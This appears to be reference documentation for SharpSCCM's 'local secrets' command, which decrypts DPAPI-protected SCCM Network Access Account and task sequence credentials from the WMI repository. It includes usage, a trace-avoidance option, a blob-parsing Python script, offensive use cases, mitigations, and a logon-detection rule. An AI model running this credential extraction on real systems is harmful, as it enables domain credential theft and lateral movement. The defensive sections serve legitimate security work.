
Overview

Get policy secrets (e.g., network access accounts, task sequences, and collection variables) stored locally in the WMI repository. The command locates the DPAPI-protected blobs on the local SCCM client, recovers the machine's DPAPI key material, and decrypts the blobs into plain-text credentials.
This command requires membership in the local Administrators group on the SCCM client, because decrypting the blobs depends on reading the machine's DPAPI_SYSTEM LSA secret. Treat the output as recovered domain credentials.

Syntax

SharpSCCM local secrets [options]
Alias: SharpSCCM local naa

Parameters

-m, --method <wmi|disk>
    string, required
    The method of obtaining the DPAPI-protected blobs:
      • wmi: query the live root\ccm\policy\Machine\ActualConfig namespace (currently applied policy only)
      • disk: parse the CIM repository file OBJECTS.DATA directly (can also retrieve historic secrets)

--get-system
    boolean, optional
    Escalate to SYSTEM via token duplication before reading the LSA secret. Without this option the command instead modifies the permissions on the LSA secrets registry key (under HKLM\SECURITY\Policy\Secrets) so that a local administrator can read it. That ACL change is a modification of the SECURITY hive that may be audited, so prefer --get-system when leaving fewer traces matters.

Examples

# Extract secrets from the live WMI namespace (currently applied policy only)
SharpSCCM local secrets -m wmi

# Parse OBJECTS.DATA instead, to also recover historic secrets
SharpSCCM local secrets -m disk

# Same, but obtain SYSTEM by token duplication instead of changing the LSA secrets registry permissions
SharpSCCM local secrets -m disk --get-system

Extraction Methods

wmi: queries the root\ccm\policy\Machine\ActualConfig namespace on the running client. The NAA policy, for example, is the CCM_NetworkAccessAccount class in that namespace, whose NetworkAccessUsername and NetworkAccessPassword properties hold the protected blobs. This method returns:
  • Network Access Account credentials
  • Task sequence variables
  • Collection variables
  • Currently active secrets only: the namespace holds the policy as it is now, so a rotated or removed NAA is no longer present in it

disk: parses the CIM repository file, %SystemRoot%\System32\wbem\Repository\OBJECTS.DATA, directly instead of asking WMI. This method returns:
  • All secrets, including historic or deleted ones, because superseded policy instances linger in the file after the live namespace has moved on
  • Network Access Accounts
  • Task sequences with embedded credentials
  • More comprehensive than wmi, but requires file system access to the repository file

Output Format

The command prints the DPAPI key material it recovers, then the decrypted secrets. Sample output (all values are illustrative):
[+] Secret: DPAPI_SYSTEM
    full: D88A555FF23B7BD491E17C729230CF72DADCB3208E8F4FFDCDC156EAA9BA4465BD207D865B66A2DA
     m/u: D88A555FF23B7BD491E17C729230CF72DADCB320 / 8E8F4FFDCDC156EAA9BA4465BD207D865B66A2DA

[+] SYSTEM master key cache:
    {1c383f70-2563-4e97-a0fb-6818e143f5cb}:833327774AA9CD63EEC2E0D6E37CFD6CABDA79F7

[+] Decrypting network access account credentials

    NetworkAccessUsername: APERTURE\networkaccess
    NetworkAccessPassword: P@ssw0rd

full is the 40-byte DPAPI_SYSTEM LSA secret; m/u are its two 20-byte halves, the machine key and the user key, which decrypt the SYSTEM account's DPAPI master key files. Each master key cache line is a master key GUID followed by the SHA-1 of that master key, the value actually used to derive a blob's decryption key. A policy blob names the GUID of its master key in its header, so a blob can only be decrypted when that GUID appears in the cache.

Types of Secrets Extracted

Network Access Accounts (NAA): domain accounts that SCCM clients use to read content from distribution points:
  • Often over-privileged domain accounts, granted far more than the read access to content shares they need
  • Used when the computer account cannot authenticate, e.g. during OS deployment from WinPE or on workgroup clients
  • Valuable for lateral movement and privilege escalation

Task sequence variables: variables embedded in task sequences, which may contain:
  • Domain join credentials
  • Service account passwords
  • Application installation credentials

Collection variables: variables assigned to device collections, which may contain:
  • Environment-specific credentials
  • Application-specific secrets
  • Configuration passwords

Security Implications

Network Access Accounts are often over-privileged, and the same NAA password is delivered to every client that receives the policy, so compromising any one client is enough to obtain it. A recovered NAA can provide:
  • Domain authentication capabilities
  • Access to distribution points and file shares
  • Potential for lateral movement within the domain
  • Privilege escalation opportunities, wherever the account was granted rights beyond reading content

DPAPI Decryption Process

  1. DPAPI_SYSTEM secret: read from the LSA secrets; the 40-byte value splits into a 20-byte machine key and a 20-byte user key (the m/u line in the output)
  2. Master key cache: the SYSTEM account's DPAPI master key files are decrypted with those keys and cached as master key GUID to SHA-1 of the key
  3. Blob decryption: each DPAPI-protected policy blob names, in its header, the GUID of the master key it was protected with; that entry is taken from the cache and the blob is decrypted
  4. Credential parsing: the decrypted data is parsed into plain-text usernames, passwords and variable values

Requirements:
  • Local Administrators membership: required to reach the LSA secret, either by changing the permissions on the LSA secrets registry key (the default) or by duplicating a SYSTEM token (--get-system)
  • SYSTEM token: optional; avoids the registry permission change
  • File system access: required for the disk method to read OBJECTS.DATA
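The disk method above, and steps 2 and 3 of this process, reduce to two parsing jobs: find the PolicySecret elements in OBJECTS.DATA, then read each DPAPI blob's header to learn which master key GUID it was protected with, so the right entry can be taken from the cache. The following Python is an added example written for this page; it is not SharpSCCM's code. It assumes the <PolicySecret Version="1"><![CDATA[...]]></PolicySecret> wrapper that SCCM puts around the hex-encoded blob, and because this page does not document the bytes that precede the blob inside that hex, it locates the blob by its DPAPI provider GUID rather than by a fixed offset. The blob layout itself is the standard DPAPI_BLOB structure. The repository buffer, the second master key GUID and all ciphertext are constructed (the blobs are parseable, not decryptable); the first GUID and the cache entry reuse the values from the sample output above. Decryption itself (master key files plus AES) is out of scope here.

```python
"""Find SCCM policy secrets in a CIM repository dump and parse their DPAPI blob headers."""
import io
import re
import struct
import uuid

# Provider GUID that follows the 4-byte version field at the start of every DPAPI blob.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
DPAPI_PROVIDER_HEX = DPAPI_PROVIDER_GUID.bytes_le.hex().upper()
# XML wrapper SCCM puts around the hex-encoded blob; the same bytes land in OBJECTS.DATA.
POLICY_SECRET_RE = re.compile(
    rb'<PolicySecret Version="1"><!\[CDATA\[([0-9A-Fa-f]+)\]\]></PolicySecret>')
# CryptoAPI ALG_ID values commonly seen in DPAPI blob headers.
CALG_NAMES = {0x6603: "CALG_3DES", 0x660E: "CALG_AES_128", 0x660F: "CALG_AES_192",
              0x6610: "CALG_AES_256", 0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}
CRYPTPROTECT_LOCAL_MACHINE = 0x4  # dwFlags bit: protected under the machine DPAPI key

def find_policy_secrets(data: bytes) -> list:
    """Return the raw DPAPI blob of every PolicySecret in data, in file order. The CDATA hex
    carries a short prefix before the blob (its layout is assumed, not documented on this page),
    so the blob is located by its provider GUID, keeping the 8 hex chars of dwVersion before it."""
    blobs = []
    for m in POLICY_SECRET_RE.finditer(data):
        hexstr = m.group(1).decode("ascii").upper()
        idx = hexstr.find(DPAPI_PROVIDER_HEX)
        if idx < 8:
            continue  # no DPAPI header in this element: skip rather than mis-parse
        blobs.append(bytes.fromhex(hexstr[idx - 8:]))
    return blobs

def parse_dpapi_blob(blob: bytes) -> dict:
    """Walk the DPAPI_BLOB layout (version, provider GUID, master key GUID, flags, description,
    algorithms, salt, HMAC keys, data, signature) without decrypting anything."""
    buf = io.BytesIO(blob)
    def u32(): return struct.unpack("<I", buf.read(4))[0]
    def guid(): return uuid.UUID(bytes_le=buf.read(16))
    def counted(): return buf.read(u32())       # DWORD length, then that many bytes
    version, provider = u32(), guid()
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob")
    u32()                                       # master key version, always 1
    master_key = guid()
    flags = u32()
    description = counted().decode("utf-16-le").rstrip("\x00")
    alg_crypt, _crypt_bits = u32(), u32()
    salt = counted()
    counted()                                   # "strong" HMAC key, normally empty
    alg_hash, _hash_bits = u32(), u32()
    counted()                                   # HMAC2 key
    data = counted()
    sign = counted()
    return {"master_key": "{%s}" % master_key,  # same form as the master key cache output
            "local_machine": bool(flags & CRYPTPROTECT_LOCAL_MACHINE),
            "description": description,
            "alg_crypt": CALG_NAMES.get(alg_crypt, hex(alg_crypt)),
            "alg_hash": CALG_NAMES.get(alg_hash, hex(alg_hash)),
            "salt_len": len(salt), "data_len": len(data), "sign_len": len(sign)}

def match_master_keys(data: bytes, master_key_cache: dict) -> list:
    """Pair every blob in data with the cached SYSTEM master key it needs. master_key_cache maps
    "{guid}" -> SHA-1 hex as in the cache output above; None means this cache cannot decrypt it."""
    results = []
    for blob in find_policy_secrets(data):
        header = parse_dpapi_blob(blob)
        header["master_key_sha1"] = master_key_cache.get(header["master_key"])
        results.append(header)
    return results

# ---- Constructed sample input; no real repository file is read ---------------------------
def build_blob(master_key: uuid.UUID, ciphertext: bytes) -> bytes:
    """Real header layout with made-up salt, ciphertext and signature: parseable, not decryptable."""
    def counted(b): return struct.pack("<I", len(b)) + b
    return (struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le + struct.pack("<I", 1)
            + master_key.bytes_le + struct.pack("<I", CRYPTPROTECT_LOCAL_MACHINE)
            + counted("\x00".encode("utf-16-le"))                    # empty description
            + struct.pack("<II", 0x6610, 256) + counted(b"\x11" * 32) + counted(b"")
            + struct.pack("<II", 0x800E, 512) + counted(b"")
            + counted(ciphertext) + counted(b"\x22" * 64))

def policy_secret_xml(blob: bytes) -> bytes:
    prefix = struct.pack("<I", len(blob)).hex().upper()  # assumed 4-byte prefix before the blob
    return (b'<PolicySecret Version="1"><![CDATA[' + prefix.encode()
            + blob.hex().upper().encode() + b"]]></PolicySecret>")

MK_CURRENT = uuid.UUID("1c383f70-2563-4e97-a0fb-6818e143f5cb")  # GUID from the sample output
MK_OLD = uuid.UUID("9b1d6d5e-0f1c-4f7a-8a35-7e0f3c2a1b10")      # made up: a superseded key
SAMPLE_OBJECTS_DATA = (b"\x00" * 16 + b"CCM_NetworkAccessAccount" + b"\x00" * 8
                       + policy_secret_xml(build_blob(MK_CURRENT, b"\xaa" * 48)) + b"\x00" * 32
                       + policy_secret_xml(build_blob(MK_OLD, b"\xbb" * 48)))
SAMPLE_CACHE = {"{1c383f70-2563-4e97-a0fb-6818e143f5cb}": "833327774AA9CD63EEC2E0D6E37CFD6CABDA79F7"}

if __name__ == "__main__":
    for entry in match_master_keys(SAMPLE_OBJECTS_DATA, SAMPLE_CACHE):
        print(entry)
```

Run as-is it prints both headers: the first resolves to the cached SHA-1, the second (the superseded policy instance, the kind of hit only the disk method produces) has master_key_sha1 set to None. On a real client, pass the bytes of OBJECTS.DATA as data and build the cache from the SYSTEM master key cache lines in the command's output; a None there means the cache you built lacks that master key, and the master key files under %SystemRoot%\System32\Microsoft\Protect\S-1-5-18 are where it would have to come from.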

Common Use Cases

  • Credential harvesting: extract NAA credentials for domain authentication and lateral movement
  • Historic recovery: use the disk method to recover deleted or changed credentials from the CIM repository
  • Privilege escalation: leverage discovered credentials for domain privilege escalation

Mitigation Recommendations

Organizations should:
  • Enable Enhanced HTTP so clients authenticate to distribution points with tokens instead of the NAA, then remove the NAA from the site so that no further clients receive it
  • Where an NAA is still required, grant it only read access to content on distribution points and no other rights in the domain (least privilege)
  • Rotate NAA passwords regularly, and treat rotation as containment rather than cleanup: the old credential stays in each client's OBJECTS.DATA and remains recoverable with the disk method for as long as it persists there
  • Monitor NAA usage: the account should only ever perform network logons to distribution points, so any other logon type, any other target host, or a failed logon for it warrants investigation
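The monitoring recommendation is the one that can be written down as a rule. Below is an added example for this page, not SharpSCCM's code: the detection a SOC would start from, run over constructed Security log events in JSON-per-line form. The NAA name is the one from the sample output above; the distribution point hostnames, the flat field names (TargetUserName, TargetDomainName, LogonType, Computer and IpAddress, as in the 4624/4625 event XML) and the events themselves are assumptions made for the example.

```python
"""Flag Network Access Account logons outside its one legitimate pattern: network (type 3)
logons to distribution points. Input is constructed JSON-per-line in the shape of Security
4624/4625 EventData; a real pipeline may rename these fields."""
import json

# Assumed inventory: the NAA (domain, account) from the sample output, and the DP hostnames.
NAA_DOMAIN, NAA_USER = "APERTURE", "networkaccess"
DISTRIBUTION_POINTS = {"DP01.aperture.local", "DP02.aperture.local"}
NETWORK_LOGON = 3


def classify_naa_event(ev: dict):
    """Return None when the event is benign for this rule, otherwise a reason string."""
    who = (ev.get("TargetDomainName", "").upper(), ev.get("TargetUserName", "").lower())
    if who != (NAA_DOMAIN, NAA_USER):
        return None  # some other account; out of scope for this rule
    if ev.get("EventID") == 4625:
        # Failed NAA logons are rare in normal operation; after a rotation they usually mean
        # someone is replaying a password recovered from a client's WMI repository.
        return "failed logon for the NAA"
    if ev.get("EventID") != 4624:
        return None
    reasons = []
    if int(ev.get("LogonType", -1)) != NETWORK_LOGON:
        reasons.append("logon type %s instead of network (3)" % ev.get("LogonType"))
    if ev.get("Computer") not in DISTRIBUTION_POINTS:
        reasons.append("logon to non-DP host %s" % ev.get("Computer"))
    return "; ".join(reasons) or None


def scan_logon_events(lines) -> list:
    """Run the rule over JSON lines; returns (EventRecordID, IpAddress, reason) per hit."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        reason = classify_naa_event(ev)
        if reason:
            hits.append((ev["EventRecordID"], ev.get("IpAddress"), reason))
    return hits


# Constructed sample events: one expected NAA logon, two anomalous ones, an unrelated
# account, and a failed NAA logon from the same source as the interactive logon.
SAMPLE_EVENTS = """
{"EventID": 4624, "EventRecordID": 1001, "Computer": "DP01.aperture.local", "TargetDomainName": "APERTURE", "TargetUserName": "networkaccess", "LogonType": 3, "IpAddress": "10.0.5.23"}
{"EventID": 4624, "EventRecordID": 1002, "Computer": "FS01.aperture.local", "TargetDomainName": "APERTURE", "TargetUserName": "networkaccess", "LogonType": 3, "IpAddress": "10.0.9.77"}
{"EventID": 4624, "EventRecordID": 1003, "Computer": "WS042.aperture.local", "TargetDomainName": "APERTURE", "TargetUserName": "networkaccess", "LogonType": 10, "IpAddress": "10.0.9.77"}
{"EventID": 4624, "EventRecordID": 1004, "Computer": "DP01.aperture.local", "TargetDomainName": "APERTURE", "TargetUserName": "svc_backup", "LogonType": 3, "IpAddress": "10.0.1.5"}
{"EventID": 4625, "EventRecordID": 1005, "Computer": "DC01.aperture.local", "TargetDomainName": "APERTURE", "TargetUserName": "networkaccess", "LogonType": 3, "IpAddress": "10.0.9.77"}
"""

if __name__ == "__main__":
    for hit in scan_logon_events(SAMPLE_EVENTS.splitlines()):
        print(hit)
```

Record 1001 is the only NAA logon that passes; 1002 hits because a file server is not a distribution point, 1003 hits on both logon type and host, and 1005 is the failed logon. Pivoting on the shared source address 10.0.9.77 is the natural next step in triage, since the same host that attempted an interactive NAA logon is also the one failing against the domain controller.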